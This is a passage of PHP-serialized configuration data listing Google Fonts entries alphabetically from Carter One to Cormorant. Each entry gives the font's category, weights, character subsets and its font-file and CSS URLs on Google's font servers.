One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/carterone/v8/5X_LFvdbcB7OBG7hBgZ7fPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Carter+One:regular";}}s:9:"catamaran";a:7:{s:4:"name";s:9:"Catamaran";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:9:{i:0;s:3:"100";i:1;s:3:"200";i:2;s:3:"300";i:3;s:7:"regular";i:4;s:3:"500";i:5;s:3:"600";i:6;s:3:"700";i:7;s:3:"800";i:8;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:5:"tamil";i:2;s:9:"latin-ext";}s:5:"files";a:9:{i:100;s:87:"http://fonts.gstatic.com/s/catamaran/v1/ilWHBiy0krUPdlmYxDuqC6CWcynf_cDxXwCLxiixG1c.ttf";i:200;s:87:"http://fonts.gstatic.com/s/catamaran/v1/hFc-HKSsGk6M-psujei1MC3USBnSvpkopQaUR-2r7iU.ttf";i:300;s:87:"http://fonts.gstatic.com/s/catamaran/v1/Aaag4ccR7Oh_4eai-jbrYC3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/catamaran/v1/MdNkM-DU8f6R-25Nxpr_XA.ttf";i:500;s:87:"http://fonts.gstatic.com/s/catamaran/v1/83WSX3F86qsvj1Z4EI0tQi3USBnSvpkopQaUR-2r7iU.ttf";i:600;s:87:"http://fonts.gstatic.com/s/catamaran/v1/a9PlHHnuBWiGGk0TwuFKTi3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:87:"http://fonts.gstatic.com/s/catamaran/v1/PpgVtUHUdnBZYNpnzGbScy3USBnSvpkopQaUR-2r7iU.ttf";i:800;s:87:"http://fonts.gstatic.com/s/catamaran/v1/6VjB_uSfn3DZ93IQv58CmC3USBnSvpkopQaUR-2r7iU.ttf";i:900;s:87:"http://fonts.gstatic.com/s/catamaran/v1/5ys9TqpQc9Q6gHqbSox6py3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:9:{i:100;s:53:"https://fonts.googleapis.com/css?family=Catamaran:100";i:200;s:53:"https://fonts.googleapis.com/css?family=Catamaran:200";i:300;s:53:"https://fonts.googleapis.com/css?family=Catamaran:300";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Catamaran:regular";i:500;s:53:"https://fonts.googleapis.com/css?family=Catamaran:500";i:600;s:53:"https://fonts.googleapis.com/css?family=Catamaran:600";i:700;s:53:"https://fonts.googleapis.com/css?family=Catamaran:700";i:800;s:53:"https://fonts.googleapis.com/css?family=Catamaran:800";i:900;s:53:"https://fonts.googleapis.com/css?family=Catamaran:900";}}s:6:"caudex";a:7:{s:4:"name";s:6:"Caudex";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/caudex/v6/PWEexiHLDmQbn2b1OPZWfg.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/caudex/v6/XjMZF6XCisvV3qapD4oJdw.ttf";i:700;s:63:"http://fonts.gstatic.com/s/caudex/v6/PetCI4GyQ5Q3LiOzUu_mMg.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/caudex/v6/yT8YeHLjaJvQXlUEYOA8gqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:4:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Caudex:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Caudex:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Caudex:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Caudex:700italic";}}s:6:"caveat";a:7:{s:4:"name";s:6:"Caveat";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/caveat/v2/8I23b6N-6rRVbh-C_Vx3yA.ttf";i:700;s:63:"http://fonts.gstatic.com/s/caveat/v2/LkaFtQENGJry2eUMwGRTeA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Caveat:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Caveat:700";}}s:12:"caveat_brush";a:7:{s:4:"name";s:12:"Caveat Brush";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/caveatbrush/v2/_d7bgsk3hfC4DXnUEeYKsy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Caveat+Brush:regular";}}s:18:"cedarville_cursive";a:7:{s:4:"name";s:18:"Cedarville Cursive";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/cedarvillecursive/v7/cuCe6HrkcqrWTWTUE7dw-41zwq9-z_Lf44CzRAA0d0Y.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Cedarville+Cursive:regular";}}s:11:"ceviche_one";a:7:{s:4:"name";s:11:"Ceviche One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/cevicheone/v7/WOaXIMBD4VYMy39MsobJhKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Ceviche+One:regular";}}s:6:"changa";a:7:{s:4:"name";s:6:"Changa";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";i:6;s:3:"800";}s:7:"subsets";a:3:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:9:"latin-ext";}s:5:"files";a:7:{i:200;s:63:"http://fonts.gstatic.com/s/changa/v2/QNWVD9FzsnhVmHzE7HryDQ.ttf";i:300;s:63:"http://fonts.gstatic.com/s/changa/v2/OKZ0H1bMg3M9EZMVzgQ9fg.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/changa/v2/7_e8qktkj6uKM0DamZJY9Q.ttf";i:500;s:63:"http://fonts.gstatic.com/s/changa/v2/KrXcHYf9ILB8aFWCj0Vfxg.ttf";i:600;s:63:"http://fonts.gstatic.com/s/changa/v2/6uCpqxwcsYkfV0M8Ls6WPA.ttf";i:700;s:63:"http://fonts.gstatic.com/s/changa/v2/vAXzeaPkdpxlejFN7h0ibw.ttf";i:800;s:63:"http://fonts.gstatic.com/s/changa/v2/H3IsiH2Fx0Pc4_OU4HSpng.ttf";}s:4:"urls";a:7:{i:200;s:50:"https://fonts.googleapis.com/css?family=Changa:200";i:300;s:50:"https://fonts.googleapis.com/css?family=Changa:300";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Changa:regular";i:500;s:50:"https://fonts.googleapis.com/css?family=Changa:500";i:600;s:50:"https://fonts.googleapis.com/css?family=Changa:600";i:700;s:50:"https://fonts.googleapis.com/css?family=Changa:700";i:800;s:50:"https://fonts.googleapis.com/css?family=Changa:800";}}s:10:"changa_one";a:7:{s:4:"name";s:10:"Changa One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/changaone/v9/dr4qjce4W3kxFrZRkVD87fesZW2xOQ-xsNqO47m55DA.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/changaone/v9/wJVQlUs1lAZel-WdTo2U9y3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Changa+One:regular";s:6:"italic";s:57:"https://fonts.googleapis.com/css?family=Changa+One:italic";}}s:6:"chango";a:7:{s:4:"name";s:6:"Chango";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/chango/v5/3W3AeMMtRTH08t5qLOjBmg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Chango:regular";}}s:8:"chathura";a:7:{s:4:"name";s:8:"Chathura";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"100";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"700";i:4;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:5:{i:100;s:86:"http://fonts.gstatic.com/s/chathura/v1/7tUse0wFXIOSPewsdeNXPvesZW2xOQ-xsNqO47m55DA.ttf";i:300;s:86:"http://fonts.gstatic.com/s/chathura/v1/Gmhr6ULHnPDt9spOZrHOfKCWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/chathura/v1/7hRNO-_zjRopkcP2n1rr8g.ttf";i:700;s:86:"http://fonts.gstatic.com/s/chathura/v1/BO9LvNAseMQ3n1tKWH-uTKCWcynf_cDxXwCLxiixG1c.ttf";i:800;s:86:"http://fonts.gstatic.com/s/chathura/v1/prh_X_5NSsBQefIdGi5B6KCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:5:{i:100;s:52:"https://fonts.googleapis.com/css?family=Chathura:100";i:300;s:52:"https://fonts.googleapis.com/css?family=Chathura:300";s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Chathura:regular";i:700;s:52:"https://fonts.googleapis.com/css?family=Chathura:700";i:800;s:52:"https://fonts.googleapis.com/css?family=Chathura:800";}}s:18:"chau_philomene_one";a:7:{s:4:"name";s:18:"Chau Philomene One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/chauphilomeneone/v5/KKc5egCL-a2fFVoOA2x6tBFi5dxgSTdxqnMJgWkBJcg.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/chauphilomeneone/v5/eJj1PY_iN4KiIuyOvtMHJP6uyLkxyiC4WcYA74sfquE.ttf";}s:4:"urls";a:2:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Chau+Philomene+One:regular";s:6:"italic";s:65:"https://fonts.googleapis.com/css?family=Chau+Philomene+One:italic";}}s:9:"chela_one";a:7:{s:4:"name";s:9:"Chela One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/chelaone/v5/h5O0dEnpnIq6jQnWxZybrA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Chela+One:regular";}}s:14:"chelsea_market";a:7:{s:4:"name";s:14:"Chelsea Market";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/chelseamarket/v4/qSdzwh2A4BbNemy78sJLfAAI1i8fIftCBXsBF2v9UMI.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Chelsea+Market:regular";}}s:6:"chenla";a:7:{s:4:"name";s:6:"Chenla";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/chenla/v9/aLNpdAUDq2MZbWz2U1a16g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Chenla:regular";}}s:17:"cherry_cream_soda";a:7:{s:4:"name";s:17:"Cherry Cream Soda";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/cherrycreamsoda/v6/OrD-AUnFcZeeKa6F_c0_WxOiHiuAPYA9ry3O1RG2XIU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Cherry+Cream+Soda:regular";}}s:12:"cherry_swash";a:7:{s:4:"name";s:12:"Cherry Swash";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/cherryswash/v4/HqOk7C7J1TZ5i3L-ejF0vi3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:89:"http://fonts.gstatic.com/s/cherryswash/v4/-CfyMyQqfucZPQNB0nvYyED2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:2:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Cherry+Swash:regular";i:700;s:56:"https://fonts.googleapis.com/css?family=Cherry+Swash:700";}}s:5:"chewy";a:7:{s:4:"name";s:5:"Chewy";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/chewy/v7/hcDN5cvQdIu6Bx4mg_TSyw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Chewy:regular";}}s:6:"chicle";a:7:{s:4:"name";s:6:"Chicle";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/chicle/v5/xg4q57Ut9ZmyFwLp51JLgg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Chicle:regular";}}s:5:"chivo";a:7:{s:4:"name";s:5:"Chivo";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"900";i:3;s:9:"900italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/chivo/v7/L88PEuzS9eRfHRZhAPhZyw.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/chivo/v7/Oe3-Q-a2kBzPnhHck_baMg.ttf";i:900;s:62:"http://fonts.gstatic.com/s/chivo/v7/JAdkiWd46QCW4vOsj3dzTA.ttf";s:9:"900italic";s:83:"http://fonts.gstatic.com/s/chivo/v7/LoszYnE86q2wJEOjCigBQ_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Chivo:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Chivo:italic";i:900;s:49:"https://fonts.googleapis.com/css?family=Chivo:900";s:9:"900italic";s:55:"https://fonts.googleapis.com/css?family=Chivo:900italic";}}s:8:"chonburi";a:7:{s:4:"name";s:8:"Chonburi";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/chonburi/v1/jd9PfbW0x_8Myt_XeUxvSQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Chonburi:regular";}}s:6:"cinzel";a:7:{s:4:"name";s:6:"Cinzel";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:3:"700";i:2;s:3:"900";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:3:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/cinzel/v4/GF7dy_Nc-a6EaHYSyGd-EA.ttf";i:700;s:63:"http://fonts.gstatic.com/s/cinzel/v4/nYcFQ6_3pf_6YDrOFjBR8Q.ttf";i:900;s:63:"http://fonts.gstatic.com/s/cinzel/v4/FTBj72ozM2cEOSxiVsRb3A.ttf";}s:4:"urls";a:3:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Cinzel:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Cinzel:700";i:900;s:50:"https://fonts.googleapis.com/css?family=Cinzel:900";}}s:17:"cinzel_decorative";a:7:{s:4:"name";s:17:"Cinzel Decorative";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:3:"700";i:2;s:3:"900";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:3:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/cinzeldecorative/v4/fmgK7oaJJIXAkhd9798yQgT5USbJx2F82lQbogPy2bY.ttf";i:700;s:94:"http://fonts.gstatic.com/s/cinzeldecorative/v4/pXhIVnhFtL_B9Vb1wq2F95-YYVDmZkJErg0zgx9XuZI.ttf";i:900;s:94:"http://fonts.gstatic.com/s/cinzeldecorative/v4/pXhIVnhFtL_B9Vb1wq2F97Khqbv0zQZa0g-9HOXAalU.ttf";}s:4:"urls";a:3:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Cinzel+Decorative:regular";i:700;s:61:"https://fonts.googleapis.com/css?family=Cinzel+Decorative:700";i:900;s:61:"https://fonts.googleapis.com/css?family=Cinzel+Decorative:900";}}s:14:"clicker_script";a:7:{s:4:"name";s:14:"Clicker Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/clickerscript/v4/Zupmk8XwADjufGxWB9KThBnpV0hQCek3EmWnCPrvGRM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Clicker+Script:regular";}}s:4:"coda";a:7:{s:4:"name";s:4:"Coda";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/coda/v11/yHDvulhg-P-p2KRgRrnUYw.ttf";i:800;s:62:"http://fonts.gstatic.com/s/coda/v11/6ZIw0sbALY0KTMWllZB3hQ.ttf";}s:4:"urls";a:2:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Coda:regular";i:800;s:48:"https://fonts.googleapis.com/css?family=Coda:800";}}s:12:"coda_caption";a:7:{s:4:"name";s:12:"Coda Caption";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{i:800;s:89:"http://fonts.gstatic.com/s/codacaption/v9/YDl6urZh-DUFhiMBTgAnz_qsay_1ZmRGmC8pVRdIfAg.ttf";}s:4:"urls";a:1:{i:800;s:56:"https://fonts.googleapis.com/css?family=Coda+Caption:800";}}s:8:"codystar";a:7:{s:4:"name";s:8:"Codystar";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:3:"300";i:1;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{i:300;s:86:"http://fonts.gstatic.com/s/codystar/v4/EVaUzfJkcb8Zqx9kzQLXqqCWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/codystar/v4/EN-CPFKYowSI7SuR7-0cZA.ttf";}s:4:"urls";a:2:{i:300;s:52:"https://fonts.googleapis.com/css?family=Codystar:300";s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Codystar:regular";}}s:5:"coiny";a:7:{s:4:"name";s:5:"Coiny";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:5:"tamil";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/coiny/v1/B-pC9lRxssd2RDK37Rdekw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Coiny:regular";}}s:5:"combo";a:7:{s:4:"name";s:5:"Combo";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/combo/v5/Nab98KjR3JZSSPGtzLyXNw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Combo:regular";}}s:9:"comfortaa";a:7:{s:4:"name";s:9:"Comfortaa";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:5:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:12:"cyrillic-ext";i:3;s:9:"latin-ext";i:4;s:8:"cyrillic";}s:5:"files";a:3:{i:300;s:87:"http://fonts.gstatic.com/s/comfortaa/v7/r_tUZNl0G8xCoOmp_JkSCi3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/comfortaa/v7/lZx6C1VViPgSOhCBUP7hXA.ttf";i:700;s:87:"http://fonts.gstatic.com/s/comfortaa/v7/fND5XPYKrF2tQDwwfWZJIy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:3:{i:300;s:53:"https://fonts.googleapis.com/css?family=Comfortaa:300";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Comfortaa:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=Comfortaa:700";}}s:11:"coming_soon";a:7:{s:4:"name";s:11:"Coming Soon";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/comingsoon/v6/Yz2z3IAe2HSQAOWsSG8COKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Coming+Soon:regular";}}s:11:"concert_one";a:7:{s:4:"name";s:11:"Concert One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/concertone/v7/N5IWCIGhUNdPZn_efTxKN6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Concert+One:regular";}}s:9:"condiment";a:7:{s:4:"name";s:9:"Condiment";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/condiment/v4/CstmdiPpgFSV0FUNL5LrJA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Condiment:regular";}}s:7:"content";a:7:{s:4:"name";s:7:"Content";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/content/v8/l8qaLjygvOkDEU2G6-cjfQ.ttf";i:700;s:85:"http://fonts.gstatic.com/s/content/v8/7PivP8Zvs2qn6F6aNbSQe_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Content:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Content:700";}}s:12:"contrail_one";a:7:{s:4:"name";s:12:"Contrail One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/contrailone/v6/b41KxjgiyqX-hkggANDU6C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Contrail+One:regular";}}s:11:"convergence";a:7:{s:4:"name";s:11:"Convergence";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/convergence/v5/eykrGz1NN_YpQmkAZjW-qKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Convergence:regular";}}s:6:"cookie";a:7:{s:4:"name";s:6:"Cookie";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/cookie/v7/HxeUC62y_YdDbiFlze357A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Cookie:regular";}}s:5:"copse";a:7:{s:4:"name";s:5:"Copse";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/copse/v6/wikLrtPGjZDvZ5w2i5HLWg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Copse:regular";}}s:6:"corben";a:7:{s:4:"name";s:6:"Corben";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/corben/v9/tTysMZkt-j8Y5yhkgsoajQ.ttf";i:700;s:63:"http://fonts.gstatic.com/s/corben/v9/lirJaFSQWdGQuV--fksg5g.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Corben:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Corben:700";}}s:9:"cormorant";a:7:{s:4:"name";s:9:"Cormorant";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"300";i:1;s:9:"300it